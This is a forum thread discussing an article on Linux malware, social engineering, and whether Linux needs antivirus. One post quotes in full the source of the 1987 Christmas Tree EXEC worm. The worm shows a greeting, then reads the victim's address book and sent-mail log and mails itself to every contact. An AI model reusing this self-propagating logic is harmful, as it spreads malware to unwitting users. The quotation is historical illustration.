How to write a Linux virus in 5 easy steps

Geekzone ^ | 11 February 2009 | foobar/unknown

[zeugma]

• The author doesn't understand the difference between a virus and a trojan, but we see that all the time.
  
• Those who commented about the size of Linux market share as being the reason it doesn't get viruses, need to look into the "witty" worm. Google is your friend.
• The author's comment about the Thunar file manager and the difference between how it works in Gnome/Kde were right on target. Nothing the user saves should be automatically executable.
• I don't know what his problem is with attachments in Evolution. Works fine for me.
  

[papasmurf]

Yeah--his terminology is wrong, but it's still valid that malware can corrupt your linux machine...

...IF you are running KDE or Gnome, and IF you open an attachment, and IF you have Python installed, and IF the Moon is in the 7th House, and IF...

Honestly, if someone opens an attachment that they aren't sure of, regardless of their OS, they deserve to be walloped by malware/virus/trojan, and a frying pan to the head!

[ShadowAce]

Understood. But now no one can honestly say that we tout the invulnerability of *nix.

:)

[papasmurf]

“But now no one can honestly say that we tout the invulnerability of *nix.”

Ah, good point. LOL

[papasmurf]

[papasmurf]

BTW, a FREE pocket guide to Ubuntu is available for FREE download, without registration, in .pdf format.

Check out these nude pictures of Ubuntu Pocket Guide and Reference

LOLOLOLOL

[cynwoody]

What the author describes is a social engineering attack. You can install as strong a lock on the door as you want, but if the hacker can persuade the user to open the door, you lose!

I did like his little appendix on root escalation via patience.

Macs, by the way, are also vulnerable to the attack described. However, there is one additional level of protection: You get a warning the first time you run something downloaded from the internet. You can ignore it of course, but you do get the warning. Social engineering, remember.

The more things change, the more they stay the same. One of the original computer worms was the famous Christmas Tree EXEC of 1987, which shut down IBM's internal network by flooding it with traffic. It was written in Rexx, not bash/Python, but, like what the article describes, it depended on social engineering. It was sent to victims using the system's email facility. When a user chose to run it, it would draw a cute Christmas tree on the 3270 display and then send itself to everybody in the user's contact list.

Here's the code:

/*********************/
/*    LET THIS EXEC  */
/*		     */
/*	  RUN	     */
/*		     */
/*	  AND	     */
/*		     */
/*	 ENJOY	     */
/*		     */
/*     YOURSELF!     */
/*********************/
'VMFCLEAR'
SAY '                *               '
SAY '                *               '
SAY '               ***              '
SAY '              *****             '
SAY '             *******            '
SAY '            *********           '
SAY '          *************                A'
SAY '             *******            '
SAY '           ***********                VERY'
SAY '         ***************        '
SAY '       *******************            HAPPY'
SAY '           ***********          '
SAY '         ***************            CHRISTMAS'
SAY '       *******************      '
SAY '     ***********************         AND MY'
SAY '         ***************        '
SAY '       *******************         BEST WISHES'
SAY '     ***********************    '
SAY '   ***************************     FOR THE NEXT'
SAY '             ******             '
SAY '             ******                    YEAR'
SAY '             ******               '
/*     browsing this file is no fun at all
       just type CHRISTMAS from cms */
dropbuf
makebuf
"q t (stack"
  pull d1 d2 d3 d4 d5 dat
  pull zeile
  jeah = substr(dat,7,2)
  tack = substr(dat,4,2)
  mohn = substr(dat,1,2)
if jeah <= 88 then do
if mohn <2 ] mohn = 12 then do
DROPBUF
MAKEBUF
"IDENTIFY ( FIFO"
PULL WER VON WO IST REST
DROPBUF
MAKEBUF
"EXECIO * DISKR " WER " NAMES A (FIFO"
 DO WHILE QUEUED() > 0
    PULL NICK NAME ORT
    NAM = INDEX(NAME,'.')+1
    IF NAM > 0 THEN DO
       NAME = SUBSTR(NAME,NAM)
    END
    NAM = INDEX(ORT,'.')+1
    IF NAM > 0 THEN DO
       ORT  = SUBSTR(ORT,NAM)
    END
    IF LENGTH(NAME)>0 THEN DO
       IF LENGTH(ORT) = 0 THEN DO
	  ORT = WO
       END
       if name ^= "RELAY" then do
       "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
       end
    END
 END
DROPBUF
MAKEBUF
ANZ = 1
"EXECIO * DISKR " WER " NETLOG A (FIFO"
 DO WHILE QUEUED() > 0
    PULL KIND FN FT FM ACT FROM ID AT NODE REST
    IF ACT = 'SENT'  THEN DO
       IF ANZ = 1 THEN DO
	 OK.ANZ = ID
       END
       IF ANZ > 1 THEN DO
	 OK.ANZ = ID
	 NIXIS = 0
	 DO I = 1 TO ANZ-1
	    IF OK.I = ID THEN DO
	       NIXIS = 1
	    END
	 END
       END
       ANZ = ANZ + 1
       IF NIXIS = 0 THEN DO
       "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
       END
    END
 END
DROPBUF
END
end
end

[N3WBI3]

This is describing a trojan, not a virus..

[N3WBI3]

Thats like saying fords are vulnerable because if you go into a wall at 100mph without your seat belt you can get hurt... Thats true of *any* car..

[ShadowAce]

Thats true of *any* car..

Yeah--that's my point as well (See Post #23).

[Ernest_at_the_Beach]

I remember hearing about that....

[Ernest_at_the_Beach]

Thanks for that Link....was just reading this at PcMAG.Com:

Dvorak Likes Linux

Date is 03.09.09

Almost all the newest hardware coming out has Linux support. The critical mass has been reached, and it's time everyone tried Ubuntu.

And he discusses the Malware issue...with Windows....

[Ernest_at_the_Beach]

Found this at Amazon...a forum topic:

Linux virus protection? **************************EXCERPT************************

KATT says:

Are there free linux downloads that are good replacements for Norton anti-virus?

Showing 1-14 of 14 posts in this discussion

[Ernest_at_the_Beach]

Running thru the Forum topic...this user has an approach to minimize damage from Malware:

*******************EXCERPT INTRO*****************************

howard says:

One of the paranoid things that I do for my system is I have three accounts:...............

(MORE) at the link:

*************************************

This goes to a reply....be aware

[ShadowAce]

He does have a good point--even though Linux systems can't get infected by Windows virii, you can be a carrier.

So there are cases where it would be a good idea to have some sort of AV running.

[joseph20]

The entire premise of this article is predicated upon the assumption that the user takes some stupid action (like executing an attachment from an email).

The problem with Windows has always been more than just stupid user actions. Windows has been vulnerable to viruses, worms, trojans, malware, etc, without the user taking any stupid actions at all.

[Ernest_at_the_Beach]

I think that would only be the case if one was running WINE ( under Linux)...right?

[ShadowAce]

The entire premise of this article is predicated upon the assumption that the user takes some stupid action (like executing an attachment from an email).

Exactly. This shows that there is a difference between POSIX-based systems and Windows-based system at a technical level. The lack of virii on Linux/OSX is not due to their lack of popularity, but to fundamental design differences.

[Ernest_at_the_Beach]

Include me in the group...except Texas Fossil is a young one....I have a decade on him!!!

[ShadowAce]

Not necessarily. You could receive a virus in an e-mail and forward it on to Windows users, perhaps. While it won’t infect you, you could spread it around.